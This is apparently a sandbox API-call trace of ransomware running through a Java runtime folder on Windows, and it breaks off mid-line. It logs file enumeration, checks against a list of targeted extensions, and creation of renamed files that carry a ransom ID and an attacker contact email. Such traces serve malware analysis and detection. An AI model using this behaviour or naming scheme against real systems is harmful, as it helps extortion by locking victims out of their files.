[0158.161] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.161] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=455744) returned 1 [0158.161] CloseHandle (hObject=0x414) returned 1 [0158.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll")) returned 0x20 [0158.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.165] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.165] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.165] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.165] lstrlenW (lpString=".doc") returned 4 [0158.165] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.165] lstrlenW (lpString=".docx") returned 5 [0158.165] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0158.165] lstrlenW (lpString=".pdf") returned 4 [0158.165] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.165] lstrlenW (lpString=".xls") returned 4 [0158.165] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.165] lstrlenW (lpString=".xlsx") returned 5 [0158.165] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0158.165] lstrlenW (lpString=".ppt") returned 4 [0158.165] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.165] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.165] lstrlenW (lpString=".zip") returned 4 [0158.165] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.166] lstrlenW (lpString=".rar") returned 4 [0158.166] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.166] lstrlenW (lpString=".bz2") returned 4 [0158.166] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.166] lstrlenW (lpString=".7z") returned 3 [0158.166] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.166] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.166] lstrlenW (lpString=".dbf") returned 4 [0158.166] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.166] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.166] lstrlenW (lpString=".1cd") returned 4 [0158.166] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.166] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.166] lstrlenW (lpString=".jpg") returned 4 [0158.166] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.166] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.166] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.166] lstrlenW (lpString=".doc") returned 4 [0158.166] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.166] lstrlenW (lpString=".docx") returned 5 [0158.166] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0158.166] lstrlenW (lpString=".pdf") returned 4 [0158.166] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.166] lstrlenW (lpString=".xls") returned 4 [0158.166] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.166] lstrlenW (lpString=".xlsx") returned 5 [0158.166] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0158.167] lstrlenW (lpString=".ppt") returned 4 [0158.167] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.167] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.167] lstrlenW (lpString=".zip") returned 4 [0158.167] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.167] lstrlenW (lpString=".rar") returned 4 [0158.167] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.167] lstrlenW (lpString=".bz2") returned 4 [0158.167] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.167] lstrlenW (lpString=".7z") returned 3 [0158.167] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.167] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.167] lstrlenW (lpString=".dbf") returned 4 [0158.167] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.167] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.167] lstrlenW (lpString=".1cd") returned 4 [0158.167] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.167] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0158.167] lstrlenW (lpString=".jpg") returned 4 [0158.167] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.167] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.167] lstrlenW (lpString="gstreamer-lite.dll") returned 18 [0158.167] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.169] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=619584) returned 1 [0158.169] CloseHandle (hObject=0x414) returned 1 [0158.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll")) returned 0x20 [0158.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.169] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.169] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.170] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.170] lstrlenW (lpString=".doc") returned 4 [0158.170] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.170] lstrlenW (lpString=".docx") returned 5 [0158.170] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0158.170] lstrlenW (lpString=".pdf") returned 4 [0158.170] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.170] lstrlenW (lpString=".xls") returned 4 [0158.170] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.170] lstrlenW (lpString=".xlsx") returned 5 [0158.170] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0158.170] lstrlenW (lpString=".ppt") returned 4 [0158.170] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.170] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.170] lstrlenW (lpString=".zip") returned 4 [0158.170] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.170] lstrlenW (lpString=".rar") returned 4 [0158.170] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.170] lstrlenW (lpString=".bz2") returned 4 [0158.170] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.170] lstrlenW (lpString=".7z") returned 3 [0158.170] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.170] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.170] lstrlenW (lpString=".dbf") returned 4 [0158.170] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.170] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.170] lstrlenW (lpString=".1cd") returned 4 [0158.170] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.171] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.171] lstrlenW (lpString=".jpg") returned 4 [0158.171] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.171] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.171] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.171] lstrlenW (lpString=".doc") returned 4 [0158.171] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.171] lstrlenW (lpString=".docx") returned 5 [0158.171] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0158.171] lstrlenW (lpString=".pdf") returned 4 [0158.171] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.171] lstrlenW (lpString=".xls") returned 4 [0158.171] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.171] lstrlenW (lpString=".xlsx") returned 5 [0158.171] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0158.171] lstrlenW (lpString=".ppt") returned 4 [0158.171] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.171] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.171] lstrlenW (lpString=".zip") returned 4 [0158.171] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.171] lstrlenW (lpString=".rar") returned 4 [0158.171] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.171] lstrlenW (lpString=".bz2") returned 4 [0158.171] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.171] lstrlenW (lpString=".7z") returned 3 [0158.171] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.171] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.171] lstrlenW (lpString=".dbf") returned 4 [0158.172] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.172] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.172] lstrlenW (lpString=".1cd") returned 4 [0158.172] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.172] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0158.172] lstrlenW (lpString=".jpg") returned 4 [0158.172] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.172] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.172] lstrlenW (lpString="hprof.dll") returned 9 [0158.172] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.173] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=158272) returned 1 [0158.173] CloseHandle (hObject=0x414) returned 1 [0158.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll")) returned 0x20 [0158.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.173] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.173] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.173] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.173] lstrlenW (lpString=".doc") returned 4 [0158.173] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.173] lstrlenW (lpString=".docx") returned 5 [0158.173] lstrcmpiW (lpString1=".docx", lpString2="f.dll") returned -1 [0158.173] lstrlenW (lpString=".pdf") returned 4 [0158.174] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.174] lstrlenW (lpString=".xls") returned 4 [0158.174] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.174] lstrlenW (lpString=".xlsx") returned 5 [0158.174] lstrcmpiW (lpString1=".xlsx", lpString2="f.dll") returned -1 [0158.174] lstrlenW (lpString=".ppt") returned 4 [0158.174] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.174] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.174] lstrlenW (lpString=".zip") returned 4 [0158.174] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.174] lstrlenW (lpString=".rar") returned 4 [0158.174] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.174] lstrlenW (lpString=".bz2") returned 4 [0158.174] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.174] lstrlenW (lpString=".7z") returned 3 [0158.174] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.174] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.174] lstrlenW (lpString=".dbf") returned 4 [0158.174] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.174] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.174] lstrlenW (lpString=".1cd") returned 4 [0158.174] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.174] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.174] lstrlenW (lpString=".jpg") returned 4 [0158.174] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.174] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.174] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.174] lstrlenW (lpString=".doc") returned 4 [0158.174] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.174] lstrlenW (lpString=".docx") returned 5 [0158.174] lstrcmpiW (lpString1=".docx", lpString2="f.dll") returned -1 [0158.174] lstrlenW (lpString=".pdf") returned 4 [0158.174] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.175] lstrlenW (lpString=".xls") returned 4 [0158.175] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.175] lstrlenW (lpString=".xlsx") returned 5 [0158.175] lstrcmpiW (lpString1=".xlsx", lpString2="f.dll") returned -1 [0158.175] lstrlenW (lpString=".ppt") returned 4 [0158.175] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.175] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.175] lstrlenW (lpString=".zip") returned 4 [0158.175] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.175] lstrlenW (lpString=".rar") returned 4 [0158.175] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.175] lstrlenW (lpString=".bz2") returned 4 [0158.175] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.175] lstrlenW (lpString=".7z") returned 3 [0158.175] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.175] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.175] lstrlenW (lpString=".dbf") returned 4 [0158.175] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.175] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.175] lstrlenW (lpString=".1cd") returned 4 [0158.175] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.175] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0158.175] lstrlenW (lpString=".jpg") returned 4 [0158.175] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.175] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.175] lstrlenW (lpString="instrument.dll") returned 14 [0158.175] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.176] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=123456) returned 1 [0158.176] CloseHandle (hObject=0x414) returned 1 [0158.176] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll")) returned 0x20 [0158.176] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.176] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.177] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.177] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.177] lstrlenW (lpString=".doc") returned 4 [0158.177] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.177] lstrlenW (lpString=".docx") returned 5 [0158.177] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0158.177] lstrlenW (lpString=".pdf") returned 4 [0158.177] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.177] lstrlenW (lpString=".xls") returned 4 [0158.177] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.177] lstrlenW (lpString=".xlsx") returned 5 [0158.177] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0158.177] lstrlenW (lpString=".ppt") returned 4 [0158.177] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.177] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.177] lstrlenW (lpString=".zip") returned 4 [0158.177] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.177] lstrlenW (lpString=".rar") returned 4 [0158.177] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.177] lstrlenW (lpString=".bz2") returned 4 [0158.177] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.177] lstrlenW (lpString=".7z") returned 3 [0158.177] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.177] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.177] lstrlenW (lpString=".dbf") returned 4 [0158.177] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.177] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.177] lstrlenW (lpString=".1cd") returned 4 [0158.177] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.177] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.177] lstrlenW (lpString=".jpg") returned 4 [0158.177] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.178] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.178] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.178] lstrlenW (lpString=".doc") returned 4 [0158.178] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.178] lstrlenW (lpString=".docx") returned 5 [0158.178] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0158.178] lstrlenW (lpString=".pdf") returned 4 [0158.178] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.178] lstrlenW (lpString=".xls") returned 4 [0158.178] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.178] lstrlenW (lpString=".xlsx") returned 5 [0158.178] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0158.178] lstrlenW (lpString=".ppt") returned 4 [0158.178] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.178] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.178] lstrlenW (lpString=".zip") returned 4 [0158.178] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.178] lstrlenW (lpString=".rar") returned 4 [0158.178] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.178] lstrlenW (lpString=".bz2") returned 4 [0158.178] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.178] lstrlenW (lpString=".7z") returned 3 [0158.178] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.178] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.178] lstrlenW (lpString=".dbf") returned 4 [0158.178] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.178] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.178] lstrlenW (lpString=".1cd") returned 4 [0158.178] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.178] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0158.178] lstrlenW (lpString=".jpg") returned 4 [0158.178] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.179] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.179] lstrlenW (lpString="j2pcsc.dll") returned 10 [0158.383] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0158.612] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=19008) returned 1 [0158.612] CloseHandle (hObject=0x440) returned 1 [0158.612] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll")) returned 0x20 [0158.612] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.612] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.612] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0158.612] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0158.612] lstrlenW (lpString=".doc") returned 4 [0158.612] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.612] lstrlenW (lpString=".docx") returned 5 [0158.612] lstrcmpiW (lpString1=".docx", lpString2="c.dll") returned -1 [0158.613] lstrlenW (lpString=".pdf") returned 4 [0158.613] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.613] lstrlenW (lpString=".xls") returned 4 [0158.613] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.613] lstrlenW (lpString=".xlsx") returned 5 [0158.613] lstrcmpiW (lpString1=".xlsx", lpString2="c.dll") returned -1 [0158.613] lstrlenW (lpString=".ppt") returned 4 [0158.613] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.613] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0158.613] lstrlenW (lpString=".zip") returned 4 [0158.613] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.613] lstrlenW (lpString=".rar") returned 4 [0158.613] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.613] lstrlenW (lpString=".bz2") returned 4 [0158.613] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.613] lstrlenW (lpString=".7z") returned 3 [0158.613] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.613] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0158.824] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.826] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.826] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 